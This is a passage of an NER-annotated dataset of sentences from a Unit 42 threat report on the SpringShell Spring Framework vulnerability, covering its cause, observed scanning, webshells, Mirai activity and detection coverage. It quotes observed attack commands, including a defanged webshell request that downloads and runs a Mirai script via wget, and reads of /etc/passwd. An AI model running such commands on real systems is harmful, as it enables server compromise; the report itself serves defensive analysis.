Conclusion","entities":[{"id":47488,"label":"vulnerability","start_offset":132,"end_offset":143},{"id":47487,"label":"attack-pattern","start_offset":47,"end_offset":86}],"relations":[],"Comments":[]} {"id":2409,"text":"Additional Resources Indicators Existing proofs of concept (PoCs) for exploitation work under the following conditions: Any Java application using Spring Beans packet (spring-beans-*.jar) and using Spring parameters binding could be affected by this vulnerability.","entities":[{"id":45503,"label":"SOFTWARE","start_offset":150,"end_offset":162},{"id":45504,"label":"SOFTWARE","start_offset":201,"end_offset":207},{"id":45505,"label":"SOFTWARE","start_offset":127,"end_offset":143},{"id":47489,"label":"FILEPATH","start_offset":171,"end_offset":189}],"relations":[],"Comments":[]} {"id":2410,"text":" The Spring Framework is an open-source application framework and inversion of the control container for the Java platform.","entities":[{"id":47490,"label":"SOFTWARE","start_offset":5,"end_offset":21}],"relations":[],"Comments":[]} {"id":2411,"text":"It is widely used in the industry by various programs and systems due to its powerful features and ease of use.","entities":[],"relations":[],"Comments":[]} {"id":2412,"text":"Some well-known products such as Spring Boot and Spring Cloud are developed with the Spring Framework.","entities":[{"id":45506,"label":"SOFTWARE","start_offset":33,"end_offset":44},{"id":45508,"label":"SOFTWARE","start_offset":85,"end_offset":101},{"id":45507,"label":"SOFTWARE","start_offset":49,"end_offset":61}],"relations":[],"Comments":[]} {"id":2413,"text":" The Spring Core (spring-core) is the core of the framework that provides powerful features such as inversion of control and dependency injection.","entities":[{"id":47491,"label":"SOFTWARE","start_offset":5,"end_offset":16}],"relations":[],"Comments":[]} {"id":2414,"text":"It contains the core, beans, context and Spring Expression Language (SpEL) modules.","entities":[{"id":47492,"label":"SOFTWARE","start_offset":41,"end_offset":74}],"relations":[],"Comments":[]} {"id":2415,"text":" The vulnerability is caused by the getCachedIntrospectionResults method of the Spring framework wrongly exposing the class object when binding the parameters.","entities":[{"id":45509,"label":"SOFTWARE","start_offset":80,"end_offset":96}],"relations":[],"Comments":[]} {"id":2416,"text":" The default Spring data binding mechanism allows developers to bind HTTP request details to application-specific objects.","entities":[{"id":47493,"label":"SOFTWARE","start_offset":13,"end_offset":19}],"relations":[],"Comments":[]} {"id":2417,"text":"For example, there is a simple classical application scenario in which the developer creates a trade object to capture request parameters as shown in Figure 1.","entities":[],"relations":[],"Comments":[]} {"id":2418,"text":" Then the developer creates a controller to use the object trade as shown in Figure 2. After that, the developer usually creates a request builder for the trade controller, which allows the web user to access the trade object remotely as shown in Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":2419,"text":" When web users access trade object properties, the binding process (bindRequestParameters) in the Spring framework implementation will call the getCachedIntrospectionResults method to get and set the object property in the cache.","entities":[{"id":47494,"label":"SOFTWARE","start_offset":99,"end_offset":115}],"relations":[],"Comments":[]} {"id":2420,"text":"However, the return object of the getCachedIntrospectionResults method includes a class object.","entities":[],"relations":[],"Comments":[]} {"id":2421,"text":"This means that web users can get a class object remotely by simply submitting a URL as shown in Figure 4.","entities":[],"relations":[],"Comments":[]} {"id":2422,"text":" Exposing the class object to web users is very dangerous and can lead to RCE in many ways.","entities":[],"relations":[],"Comments":[]} {"id":2423,"text":"The class loader is often used by exploiting payloads to load some sensitive classes dynamically for object modification and code execution.","entities":[{"id":47495,"label":"attack-pattern","start_offset":34,"end_offset":53}],"relations":[],"Comments":[]} {"id":2424,"text":"One easy way to get RCE is using the exposed class loader to modify the Tomcat log configuration and remotely upload a JSP web shell after changing the Tomcat log configuration.","entities":[{"id":45511,"label":"SOFTWARE","start_offset":152,"end_offset":158},{"id":7258,"label":"attack-pattern","start_offset":123,"end_offset":132},{"id":47496,"label":"SOFTWARE","start_offset":72,"end_offset":78}],"relations":[],"Comments":[]} {"id":2425,"text":"One example of changing the Tomcat log configuration by simply submitting a URL is shown in Figure 5.","entities":[{"id":47497,"label":"SOFTWARE","start_offset":28,"end_offset":34}],"relations":[],"Comments":[]} {"id":2426,"text":"This is the exploit method used in the public PoC for the SpringShell vulnerability.","entities":[{"id":47498,"label":"vulnerability","start_offset":58,"end_offset":83}],"relations":[],"Comments":[]} {"id":2427,"text":"Early in 2010, CVE-2010-1622 was assigned to a remote code execution vulnerability in the Spring Framework.","entities":[{"id":45513,"label":"vulnerability","start_offset":15,"end_offset":28},{"id":45514,"label":"SOFTWARE","start_offset":90,"end_offset":106},{"id":45515,"label":"attack-pattern","start_offset":47,"end_offset":68},{"id":45512,"label":"TIME","start_offset":0,"end_offset":13}],"relations":[{"id":106,"from_id":45514,"to_id":45513,"type":"has"},{"id":107,"from_id":45515,"to_id":45513,"type":"uses"}],"Comments":[]} {"id":2428,"text":"This vulnerability was due to the lack of proper check on the provided PropertyDescriptor in CachedIntrospectionResults() so that class.classLoader is allowed to be utilized to modify the search path of the system's class loader and cause the program to invoke remote Java code.","entities":[],"relations":[],"Comments":[]} {"id":2429,"text":"For this vulnerability, the class loader plays a vital role in the exploitation.","entities":[],"relations":[],"Comments":[]} {"id":2430,"text":" In the Spring Framework version 2.5.6.SEC02, the vulnerability was fixed.","entities":[{"id":45516,"label":"SOFTWARE","start_offset":9,"end_offset":44}],"relations":[],"Comments":[]} {"id":2431,"text":"However, while the original way of obtaining the class loader and exploiting it no longer works, a new feature of JDK was introduced in version 9, providing another way to obtain the class loader and making the exploit possible again.","entities":[{"id":47499,"label":"SOFTWARE","start_offset":114,"end_offset":117}],"relations":[],"Comments":[]} {"id":2432,"text":" The code snippet seen in Figure 6 shows the fix to CVE-2010-1622.","entities":[{"id":47500,"label":"vulnerability","start_offset":52,"end_offset":65}],"relations":[],"Comments":[]} {"id":2433,"text":"The fix is to use a block list to exclude two methods: Class.getClassLoader() and getProtectionDomain() as highlighted in Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":2434,"text":"But using a block list runs the risk of being bypassed by the cases not on the list.","entities":[],"relations":[],"Comments":[]} {"id":2435,"text":"And the Java 9 Platform Module System (JPMS) provides a way to bypass this block list.","entities":[{"id":47501,"label":"SOFTWARE","start_offset":8,"end_offset":43}],"relations":[],"Comments":[]} {"id":2436,"text":" The newly added module property makes it possible to modify the logging configuration so that a JSP webshell can be written into the web host folder via the logging function as shown in Figure 7.","entities":[{"id":47502,"label":"SOFTWARE","start_offset":97,"end_offset":100},{"id":47503,"label":"attack-pattern","start_offset":101,"end_offset":109}],"relations":[],"Comments":[]} {"id":2437,"text":" Figure 8 shows the payload drops a password-protected webshell in the Tomcat ROOT directory called shell7.jsp.","entities":[{"id":47504,"label":"SOFTWARE","start_offset":71,"end_offset":77},{"id":47505,"label":"FILEPATH","start_offset":100,"end_offset":110}],"relations":[],"Comments":[]} {"id":2438,"text":" Attackers can then invoke any command through the JSP webshell.","entities":[{"id":47507,"label":"attack-pattern","start_offset":55,"end_offset":63},{"id":47506,"label":"SOFTWARE","start_offset":51,"end_offset":54}],"relations":[],"Comments":[]} {"id":2439,"text":"Figure 9 shows the example of executing Netcat to establish a reverse shell to a remote server on the compromised server.","entities":[{"id":7297,"label":"tools","start_offset":40,"end_offset":46},{"id":47508,"label":"attack-pattern","start_offset":50,"end_offset":75}],"relations":[],"Comments":[]} {"id":2440,"text":" Exploit code for this remote code execution vulnerability has been made publicly available.","entities":[{"id":47509,"label":"attack-pattern","start_offset":23,"end_offset":44}],"relations":[],"Comments":[]} {"id":2441,"text":"Unit 42 first observed scanning traffic early on March 30, 2022 with HTTP requests to servers that included the test strings within the URL.","entities":[{"id":47510,"label":"identity","start_offset":0,"end_offset":7},{"id":47511,"label":"TIME","start_offset":49,"end_offset":63}],"relations":[],"Comments":[]} {"id":2442,"text":"Figure 10 shows an example of the early scanning activity.","entities":[],"relations":[],"Comments":[]} {"id":2443,"text":" While testing our Threat Prevention signatures, we observed additional scanning activity that included the exploit code within the data section of the HTTP POST request, as seen in Figure 11.","entities":[],"relations":[],"Comments":[]} {"id":2444,"text":" Once we deployed the Threat Prevention signatures, we analyzed the packet captures associated with our \"Spring Core Remote Code Execution Vulnerability\" signature and found that a majority of the activity was likely generated by variations of the publicly available PoC tools.","entities":[{"id":47512,"label":"vulnerability","start_offset":105,"end_offset":152}],"relations":[],"Comments":[]} {"id":2445,"text":"Our analysis shows that the following filenames would store the webshell contents on the server in the event of successful exploitation: 0xd0m7.jsp myshell.jsp shell.jsp tomcatwar.jsp wpz.jsp The webshell contents written to these files are very similar to the code included in the publicly available PoC as well.","entities":[{"id":47515,"label":"FILEPATH","start_offset":161,"end_offset":170},{"id":47516,"label":"FILEPATH","start_offset":171,"end_offset":184},{"id":47513,"label":"FILEPATH","start_offset":138,"end_offset":148},{"id":47514,"label":"FILEPATH","start_offset":149,"end_offset":160},{"id":47517,"label":"FILEPATH","start_offset":185,"end_offset":192}],"relations":[],"Comments":[]} {"id":2446,"text":"There are two variants of the webshell.","entities":[],"relations":[],"Comments":[]} {"id":2447,"text":"One was included in the PoC and uses the pwd parameter for authentication (password is always j) and the cmd parameter for the command to execute.","entities":[],"relations":[],"Comments":[]} {"id":2448,"text":"The second variant does not use a parameter for authentication and uses id for the command to execute.","entities":[],"relations":[],"Comments":[]} {"id":2449,"text":"Table 1 shows the parameters that the webshell saved to the server would use for authentication and command and how many times we saw them.","entities":[],"relations":[],"Comments":[]} {"id":2450,"text":" Table 1. Parameters used by webshells seen in hits on \"Spring Core Remote Code Execution Vulnerability\" signature.","entities":[{"id":47518,"label":"vulnerability","start_offset":56,"end_offset":103},{"id":47519,"label":"attack-pattern","start_offset":29,"end_offset":38}],"relations":[],"Comments":[]} {"id":2451,"text":" We searched our telemetry for activity to webshells using the file names associated with the SpringShell activity, with the noted exception of shell.jsp, which is far too general.","entities":[{"id":45518,"label":"FILEPATH","start_offset":144,"end_offset":153},{"id":45517,"label":"vulnerability","start_offset":94,"end_offset":105}],"relations":[],"Comments":[]} {"id":2452,"text":"We have seen the unique commands listed below submitted to webshells.","entities":[{"id":47520,"label":"attack-pattern","start_offset":59,"end_offset":67}],"relations":[],"Comments":[]} {"id":2453,"text":"Of these, only the two commands involving \/etc\/passwd would possibly suggest malicious intent for exploitation – the rest of the commands suggest general scanning activity.","entities":[{"id":47521,"label":"FILEPATH","start_offset":42,"end_offset":53}],"relations":[],"Comments":[]} {"id":2454,"text":"ls nslookup%20[redacted].test6.ggdd[.]co[.]uk nslookup+[redacted].test6.ggdd[.]co[.]uk ping%20[redacted].test6.ggdd[.]co[.]uk ping+[redacted].test6.ggdd[.]co[.]uk whoami cat%20\/etc\/passwd cat+\/etc\/passwd id ifconfig ipconfig ping%20[redacted].burpcollaborator[.]net ","entities":[{"id":45521,"label":"FILEPATH","start_offset":192,"end_offset":203},{"id":45522,"label":"DOMAIN","start_offset":233,"end_offset":265},{"id":45523,"label":"DOMAIN","start_offset":131,"end_offset":161},{"id":45524,"label":"DOMAIN","start_offset":14,"end_offset":45},{"id":45525,"label":"DOMAIN","start_offset":55,"end_offset":86},{"id":45520,"label":"FILEPATH","start_offset":176,"end_offset":187},{"id":45526,"label":"DOMAIN","start_offset":94,"end_offset":125},{"id":7335,"label":"tools","start_offset":207,"end_offset":215},{"id":7336,"label":"tools","start_offset":216,"end_offset":224},{"id":47522,"label":"tools","start_offset":163,"end_offset":169},{"id":47523,"label":"tools","start_offset":46,"end_offset":54},{"id":47525,"label":"tools","start_offset":87,"end_offset":91},{"id":47526,"label":"tools","start_offset":126,"end_offset":130},{"id":47524,"label":"tools","start_offset":3,"end_offset":11},{"id":47527,"label":"tools","start_offset":225,"end_offset":229}],"relations":[],"Comments":[]} {"id":2455,"text":"Our Spring Core Remote Code Execution Vulnerability signature was released in the early hours of March 31.","entities":[{"id":47528,"label":"vulnerability","start_offset":4,"end_offset":51},{"id":47529,"label":"TIME","start_offset":82,"end_offset":105}],"relations":[],"Comments":[]} {"id":2456,"text":"On April 7, we collected the seven days’ worth of activity since the signature release and found that the signature had triggered 43,092 times.","entities":[{"id":47530,"label":"TIME","start_offset":3,"end_offset":10}],"relations":[],"Comments":[]} {"id":2457,"text":"Figure 12 shows the steady increase of total hits from March 31 until April 3, a fairly significant decrease on April 4, followed by an incline in activity on April 5 and 6.","entities":[{"id":45527,"label":"TIME","start_offset":55,"end_offset":63},{"id":45528,"label":"TIME","start_offset":70,"end_offset":77},{"id":45529,"label":"TIME","start_offset":112,"end_offset":119},{"id":45530,"label":"TIME","start_offset":159,"end_offset":172}],"relations":[],"Comments":[]} {"id":2458,"text":"At this time, we have yet to confirm any successful exploitation attempts that led to a webshell installed onto the server outside of testing activity using purposefully vulnerable applications.","entities":[],"relations":[],"Comments":[]} {"id":2459,"text":" We observed a large amount of unique IP addresses during our analysis – with 2,056 addresses triggering the Spring Core Remote Code Execution Vulnerability signature.","entities":[{"id":47531,"label":"vulnerability","start_offset":109,"end_offset":156}],"relations":[],"Comments":[]} {"id":2460,"text":"Table 2 shows the top 15 IP addresses seen as the source that triggered our signature, which accounts for just over 50% of all of the activity we observed.","entities":[],"relations":[],"Comments":[]} {"id":2461,"text":" Table 2. Top 15 source IPs triggering the Spring Core Remote Code Execution Vulnerability signature.","entities":[{"id":47532,"label":"vulnerability","start_offset":43,"end_offset":90}],"relations":[],"Comments":[]} {"id":2462,"text":" We were able to analyze 31,953 packet captures that triggered the Spring Core Remote Code Execution Vulnerability signature to determine the webshell filenames and the webshell contents that would be saved to the server in the event of successful exploitation.","entities":[{"id":47533,"label":"vulnerability","start_offset":67,"end_offset":114},{"id":47534,"label":"attack-pattern","start_offset":142,"end_offset":150},{"id":47535,"label":"attack-pattern","start_offset":169,"end_offset":177}],"relations":[],"Comments":[]} {"id":2463,"text":"In many cases, the webshell file names had .jsp extensions, which would allow for a successful exploitation to install a working webshell.","entities":[{"id":47536,"label":"attack-pattern","start_offset":129,"end_offset":137}],"relations":[],"Comments":[]} {"id":2464,"text":"However, in many cases the filename had an extension that would not support a webshell, such as .js and .txt, which we believe was used just to mark the presence of a successful file upload as part of vulnerable server discovery efforts.","entities":[],"relations":[],"Comments":[]} {"id":2465,"text":"At the time of writing, we have observed 95 unique webshell filenames, which we have included in the indicators section.","entities":[],"relations":[],"Comments":[]} {"id":2466,"text":" A majority of the activity used the tomcarwar.jsp filename that was used in the initial PoC script, which accounted for over 57% of the filenames observed.","entities":[],"relations":[],"Comments":[]} {"id":2467,"text":"In fact, the top three filenames – tomcarwar.jsp, checkexploit.jsp and javatestfila.jsp – account for over 84% of the activity with known webshell filenames.","entities":[{"id":47537,"label":"FILEPATH","start_offset":35,"end_offset":48},{"id":47539,"label":"FILEPATH","start_offset":71,"end_offset":87},{"id":47538,"label":"FILEPATH","start_offset":50,"end_offset":66},{"id":47540,"label":"attack-pattern","start_offset":138,"end_offset":146}],"relations":[],"Comments":[]} {"id":2468,"text":"The pie chart in Figure 13 shows a high-level breakdown of the most common filenames.","entities":[],"relations":[],"Comments":[]} {"id":2469,"text":" A majority of the packets we analyzed showed the webshell contents did not differ far from the webshell seen in the original proof-of-concept script, which can be seen in Figure 14.","entities":[],"relations":[],"Comments":[]} {"id":2470,"text":"Another very common webshell seen within our telemetry is the exact same with different HTTP parameters and values used by the webshell, as seen in Figure 15.","entities":[{"id":47542,"label":"attack-pattern","start_offset":20,"end_offset":28},{"id":47541,"label":"attack-pattern","start_offset":127,"end_offset":135}],"relations":[],"Comments":[]} {"id":2471,"text":" We also observed a significant amount of exploit attempts using content that again was a modification of the initial webshell in the proof-of-concept.","entities":[{"id":47543,"label":"attack-pattern","start_offset":119,"end_offset":127}],"relations":[],"Comments":[]} {"id":2472,"text":"Figure 16 shows the contents that we observed in the wild, which should not be considered a webshell as it does nothing more than display SPRING_CORE_RCE.","entities":[{"id":47544,"label":"attack-pattern","start_offset":92,"end_offset":100}],"relations":[],"Comments":[]} {"id":2473,"text":"The lack of webshell functionality suggests that this is likely uploaded by scanners attempting to discover servers vulnerable to SpringShell.","entities":[{"id":47545,"label":"attack-pattern","start_offset":12,"end_offset":20},{"id":47546,"label":"vulnerability","start_offset":130,"end_offset":141}],"relations":[],"Comments":[]} {"id":2474,"text":" More recently, we have seen an uptick in webshell content as seen in Figure 17, which is related to another proof-of-concept script created by K3rwin.","entities":[{"id":47547,"label":"identity","start_offset":144,"end_offset":150}],"relations":[],"Comments":[]} {"id":2475,"text":"This particular webshell will load a base64 encoded class that will contain the functionality desired by the actor.","entities":[],"relations":[],"Comments":[]} {"id":2476,"text":"This particular webshell is based on AntSword’s shell.jsp, which was modified to use a parameter of k3rwin instead of ant to load the class.","entities":[{"id":7400,"label":"tools","start_offset":37,"end_offset":45},{"id":47549,"label":"identity","start_offset":100,"end_offset":106},{"id":47548,"label":"FILEPATH","start_offset":48,"end_offset":57}],"relations":[{"id":336,"from_id":7400,"to_id":47548,"type":"consists-of"}],"Comments":[]} {"id":2477,"text":" The only malicious activity we have seen in our telemetry related to SpringShell involves HTTP requests to URLs containing the tomcatwar.jsp filename associated with the SpringShell proof-of-concept script.","entities":[{"id":47550,"label":"vulnerability","start_offset":70,"end_offset":81},{"id":47551,"label":"FILEPATH","start_offset":128,"end_offset":141},{"id":47552,"label":"vulnerability","start_offset":171,"end_offset":182}],"relations":[],"Comments":[]} {"id":2478,"text":"The activity involved parameters issued to the webshell that would run a command to download and execute a script from a remote server as seen in the following: [redacted IPV4 address]:8080\/tomcatwar.jsp?pwd=j&cmd=\/bin\/sh\/-c${IFS}'cd${IFS}\/tmp;wget${IFS}hxxp:\/\/107.174.133[.]167\/t.sh${IFS}-O-%a6sh${IFS}SpringCore;' ","entities":[{"id":45532,"label":"URL","start_offset":162,"end_offset":317}],"relations":[],"Comments":[]} {"id":2479,"text":"Upon further analysis, the t.sh script hosted on this remote server is related to the Mirai botnet.","entities":[{"id":47554,"label":"FILEPATH","start_offset":27,"end_offset":31},{"id":47553,"label":"malware","start_offset":86,"end_offset":98}],"relations":[],"Comments":[]} {"id":2480,"text":"The requests above were sent from the IP address ​​194.31.98[.]186, which itself has hosted payloads associated with Mirai as well.","entities":[{"id":47555,"label":"IPV4","start_offset":51,"end_offset":66},{"id":47556,"label":"malware","start_offset":117,"end_offset":122}],"relations":[],"Comments":[]} {"id":2481,"text":"Inbound attempts to exploit the SpringShell vulnerability from 194.31.98[.]186 attempted to install the webshell from the original proof-of-concept seen in Figure 14.","entities":[{"id":45533,"label":"IPV4","start_offset":63,"end_offset":78},{"id":47557,"label":"attack-pattern","start_offset":104,"end_offset":112},{"id":47558,"label":"vulnerability","start_offset":32,"end_offset":43}],"relations":[],"Comments":[]} {"id":2482,"text":"Our signatures blocked the initial attempt to exploit the vulnerability so we cannot confirm if Mirai’s attempts to exploit SpringShell have been successful.","entities":[{"id":47559,"label":"malware","start_offset":96,"end_offset":101},{"id":47560,"label":"vulnerability","start_offset":124,"end_offset":135}],"relations":[],"Comments":[]} {"id":2483,"text":"Both Netlab 360 and Trend Micro also observed Mirai activity related to the SpringShell vulnerability.","entities":[{"id":47561,"label":"identity","start_offset":5,"end_offset":15},{"id":47562,"label":"identity","start_offset":20,"end_offset":31},{"id":47563,"label":"malware","start_offset":46,"end_offset":51},{"id":47564,"label":"vulnerability","start_offset":76,"end_offset":101}],"relations":[],"Comments":[]} {"id":2484,"text":"In addition to our threat prevention signatures, we analyzed the alerts triggered in Cortex XDR and found 116 events between April 4 and April 8.","entities":[{"id":45534,"label":"SOFTWARE","start_offset":85,"end_offset":95},{"id":45536,"label":"TIME","start_offset":137,"end_offset":144},{"id":45535,"label":"TIME","start_offset":125,"end_offset":132}],"relations":[],"Comments":[]} {"id":2485,"text":"A majority of these alerts are triggered by testing of the proof-of-concept tools previously mentioned above.","entities":[],"relations":[],"Comments":[]} {"id":2486,"text":"We also observed several alerts involving a docker container named spring4shell, which had a \/helloworld directory and had a listening port tcp\/8080.","entities":[{"id":47565,"label":"vulnerability","start_offset":67,"end_offset":79}],"relations":[],"Comments":[]} {"id":2487,"text":"We believe these docker containers are also part of internal testing efforts using publicly available docker containers, such as Spring4Shell-POC.","entities":[{"id":45537,"label":"vulnerability","start_offset":129,"end_offset":145}],"relations":[],"Comments":[]} {"id":2488,"text":"The signature triggered on the creation of the webshell files, of which we observed the following file written: \/usr\/local\/tomcat\/work\/Catalina\/localhost\/ROOT\/org\/apache\/jsp\/shell_jsp.java \/usr\/local\/tomcat\/webapps\/ROOT\/shell_.jsp SpringShell is officially assigned CVE-2022-22965, and the patch was released on March 31, 2022.","entities":[{"id":47567,"label":"FILEPATH","start_offset":190,"end_offset":231},{"id":47568,"label":"vulnerability","start_offset":268,"end_offset":282},{"id":47570,"label":"vulnerability","start_offset":233,"end_offset":244},{"id":47566,"label":"FILEPATH","start_offset":113,"end_offset":189},{"id":47569,"label":"TIME","start_offset":314,"end_offset":328},{"id":47571,"label":"attack-pattern","start_offset":47,"end_offset":55}],"relations":[{"id":337,"from_id":47570,"to_id":47568,"type":"related-to"},{"id":339,"from_id":47570,"to_id":47567,"type":"consists-of"},{"id":340,"from_id":47570,"to_id":47566,"type":"consists-of"}],"Comments":[]} {"id":2489,"text":"Since exploitation is straightforward and all the relevant technical details have already gone viral on the internet, it’s possible that SpringShell will become fully weaponized and abused on a larger scale.","entities":[{"id":47572,"label":"vulnerability","start_offset":137,"end_offset":148}],"relations":[],"Comments":[]} {"id":2490,"text":"Developers and users who have projects or products based on JDK9+ and the Spring Framework (or its derivatives) are strongly urged to patch as soon as possible.","entities":[{"id":45538,"label":"SOFTWARE","start_offset":60,"end_offset":65},{"id":45539,"label":"SOFTWARE","start_offset":74,"end_offset":90}],"relations":[],"Comments":[]} {"id":2491,"text":" While CVE-2022-22963 is a different vulnerability in Spring Cloud Function (not technically part of SpringShell), a Threat Prevention signature is also available to ensure coverage at the perimeter.","entities":[{"id":47575,"label":"vulnerability","start_offset":101,"end_offset":112},{"id":47573,"label":"vulnerability","start_offset":7,"end_offset":21},{"id":47574,"label":"SOFTWARE","start_offset":54,"end_offset":66}],"relations":[{"id":341,"from_id":47574,"to_id":47573,"type":"has"}],"Comments":[]} {"id":2492,"text":"Unit 42 researchers are proactively monitoring info related to other recently disclosed Spring vulnerabilities and will proceed to provide coverage as soon as more info has become available.","entities":[{"id":7440,"label":"identity","start_offset":0,"end_offset":7},{"id":47576,"label":"SOFTWARE","start_offset":88,"end_offset":94}],"relations":[],"Comments":[]} {"id":2493,"text":" Unit 42 is actively monitoring malicious traffic through our devices and cloud solutions.","entities":[{"id":45540,"label":"identity","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} {"id":2494,"text":" The Palo Alto Networks Product Security Assurance team is evaluating CVE-2022-22963 and CVE-2022-22965 as relates to Palo Alto Networks products and currently assigns this a severity of none.","entities":[{"id":47577,"label":"identity","start_offset":5,"end_offset":55},{"id":47578,"label":"vulnerability","start_offset":70,"end_offset":84},{"id":47580,"label":"identity","start_offset":118,"end_offset":136},{"id":47579,"label":"vulnerability","start_offset":89,"end_offset":103}],"relations":[],"Comments":[]} {"id":2495,"text":" Palo Alto Networks Next-Generation Firewall with a Threat Prevention subscription can block the attack traffic related to this vulnerability. Palo Alto Networks Prisma Cloud can detect the presence of both CVE-2022-22965 and CVE-2022-22963 across all Compute environments.","entities":[{"id":47583,"label":"vulnerability","start_offset":208,"end_offset":222},{"id":47582,"label":"SOFTWARE","start_offset":144,"end_offset":175},{"id":47581,"label":"SOFTWARE","start_offset":2,"end_offset":69},{"id":47584,"label":"vulnerability","start_offset":227,"end_offset":241}],"relations":[],"Comments":[]} {"id":2496,"text":"Palo Alto Networks Cortex XDR Prevent and Pro customers running agent version 7.4 and above with content version 450-87751 on Linux devices are protected from CVE-2022-22963 using the Java Deserialization module; customers running agent version 7.7 and content 480 and above are protected from CVE-2022-22963 and CVE-2022-22965 for both Windows and Linux using the Java Deserialization module; other OSes and exploits receive protections from post-exploitation activities using Behavioral Threat Protection, Password Theft Prevention, Anti Ransomware and other Anti Exploitation modules.","entities":[{"id":47587,"label":"vulnerability","start_offset":159,"end_offset":173},{"id":47585,"label":"SOFTWARE","start_offset":0,"end_offset":45},{"id":47588,"label":"SOFTWARE","start_offset":184,"end_offset":211},{"id":47590,"label":"vulnerability","start_offset":313,"end_offset":327},{"id":47591,"label":"SOFTWARE","start_offset":337,"end_offset":344},{"id":47593,"label":"SOFTWARE","start_offset":365,"end_offset":392},{"id":47586,"label":"SOFTWARE","start_offset":126,"end_offset":131},{"id":47589,"label":"vulnerability","start_offset":294,"end_offset":308},{"id":47592,"label":"SOFTWARE","start_offset":349,"end_offset":354}],"relations":[{"id":342,"from_id":47587,"to_id":47588,"type":"related-to"}],"Comments":[]} {"id":2497,"text":"Cortex XDR Pro customers also have visibility into post-exploitation activities and can specifically track the “Process execution with a suspicious command line indicative of the Spring4Shell exploit” and “Suspicious HTTP Request to a vulnerable Java class” Analytics BIOCs.","entities":[{"id":47598,"label":"vulnerability","start_offset":206,"end_offset":256},{"id":47599,"label":"vulnerability","start_offset":112,"end_offset":199},{"id":47594,"label":"SOFTWARE","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} {"id":2498,"text":"Furthermore, customers can create a BIOC from an XQL query looking for the dropped webshell IoCs to detect exploitation attempts in their environments.","entities":[{"id":47600,"label":"attack-pattern","start_offset":83,"end_offset":91}],"relations":[],"Comments":[]} {"id":2499,"text":" Palo Alto Networks Cortex XSOAR customers can leverage the \"Spring Core and Cloud Function SpEL RCEs\" pack to automatically detect and mitigate the vulnerabilities.","entities":[{"id":47597,"label":"vulnerability","start_offset":61,"end_offset":101},{"id":47596,"label":"SOFTWARE","start_offset":1,"end_offset":32}],"relations":[],"Comments":[]} {"id":2500,"text":"Read more on the XSOAR marketplace.","entities":[{"id":47601,"label":"SOFTWARE","start_offset":17,"end_offset":22}],"relations":[],"Comments":[]} {"id":2501,"text":"Prisma Cloud Mitigations for SpringShell and Recent Spring Vulnerabilities: CVE-2022-22963, CVE-2022-22965 How Cortex XDR Blocks SpringShell Exploits 0808a56a90ca2f8b1e91a1e60b7b451e.txt 0c901fefcae46ba984225aa72df0825c.txt 1532b681733b6bce2ff7252d8890d550.txt 28fcea06661f13ebe9c87327f949f3a8.txt 2b98432e352ff74569b81099dd5ee246.txt 4acbedbe977480d19b7b682d4878cae2.txt 4fdd6fbd220e26b63a7c9a5aa88f5f31.txt 5657e4634210a3d47a789d1389a89320.txt 646bbc2c112070c26b3c042e81c6947e.txt 70b98d30e383df910ce3d693603404fb.txt 73be7d1ef52c3dbc9a5d726288d8a4ba.txt 83d81ef47f0e9a205fb66a100f3179bf.txt 8592f3e430720d324d7cfd7ecd1de521.txt 8697f146477832389449cf2548032ca7.txt Shell.jsp UJaez.jsp Y4kws.jsp a6bfc76094f689dab978f059ea2456a1.txt aniwvzgvwqnwtehgsfsgbslwoiqkjk.jsp appli12 baf24e5f9fc18cf58172d1ba745f0f7a.txt c41fc8f359d1658559c2d1c0043c76fb.txt cbsewlaeqsdsqktavziakyzsuwfciu.jsp czbwzitpzjzkcvkrirybzihsibmuej.jsp czpdnhpraxgzrtatiuigsalfedwwit.jsp dnuurzjtlbjrnuukwdmaltqrqqlaig.jsp duvdqpoyrcapqbfcetgwsqxfkslubw.jsp ee947d98b91c8ada08f8c15e8f3248fc.txt efdde87c66fe4e6dc73a2ab6111ca58a.txt facb4be5385617bf11e6d67f0aa0203b.txt ggoibjvztvlpelaghjzeweqmopjosz.jsp goocmasqxwfufyxrgyachwidxdotkh.jsp hlbpgpqsyracfnvkgrgvlhcptpmdfn.jsp hmmyitbecwhmrdicykmfvqlcsknbff.jsp hnmqeuzumlokxuhqyekeetrgougeof.jsp ilvckpgzbrcdljyqdfhqendqcwhgxp.jsp izodfyvqujwztweclykgozahdlqvqp.jsp jynrrkjghebemkrhvfzllrepzosinb.jsp kqbnngrfnsxlreajyknuimoamysvwt.jsp ltcovlwqkckjpuzbqzbjdpkgkakvno.jsp mhoqqvpuxdqtuqzmwdrvdeayqvlygb.jsp osanxuadyvjaiorcjfqnckfpewunnt.jsp ptipfhjosfvrfwndwqccapozcbasge.jsp pxwcqxzrstepmbwufjxuaydkwgmvds.jsp qnzfvqpeiljtoyvrywrkuvkrmuewzn.jsp rQFlA.jsp rmdwahilztwhhqnmcbodkgtbnmrhjx.jsp tomcat74935.jsp ubekdurthzexowlohzgienbwvexynd.jsp ufoubgkazumxhqvwlnyfejnmyqofcm.jsp ujpmauuhltvsokjracgwkbflkhhnwo.jsp vkmckfvljtpbyowxwhgbjsvyktfdiq.jsp xcoihpiouaamtnbqqvcvffyxyrokvn.jsp yjjhhdlxepozhirznemjabnsciycvv.jsp yutugdqbrossntwaujgxwgrpgczkbd.jsp zawpiupzzsjexllfbicrgvlcuxzqyb.jsp zqgwtzyrexctiyvsawmwttncwzoyyd.jsp zuvuegtemzfsyqjfykowggxpqkuqdp.jsp 0xd0m7.jsp crashed_log_","entities":[{"id":47623,"label":"FILEPATH","start_offset":669,"end_offset":678},{"id":47602,"label":"vulnerability","start_offset":76,"end_offset":90},{"id":47603,"label":"vulnerability","start_offset":92,"end_offset":106},{"id":47604,"label":"SOFTWARE","start_offset":0,"end_offset":12},{"id":47605,"label":"vulnerability","start_offset":29,"end_offset":40},{"id":47608,"label":"vulnerability","start_offset":129,"end_offset":149},{"id":47609,"label":"FILEPATH","start_offset":151,"end_offset":187},{"id":47610,"label":"FILEPATH","start_offset":188,"end_offset":224},{"id":47611,"label":"FILEPATH","start_offset":225,"end_offset":261},{"id":47606,"label":"SOFTWARE","start_offset":52,"end_offset":58},{"id":47607,"label":"SOFTWARE","start_offset":111,"end_offset":121},{"id":47619,"label":"FILEPATH","start_offset":521,"end_offset":557},{"id":47620,"label":"FILEPATH","start_offset":558,"end_offset":594},{"id":47621,"label":"FILEPATH","start_offset":595,"end_offset":631},{"id":47622,"label":"FILEPATH","start_offset":632,"end_offset":668},{"id":47624,"label":"FILEPATH","start_offset"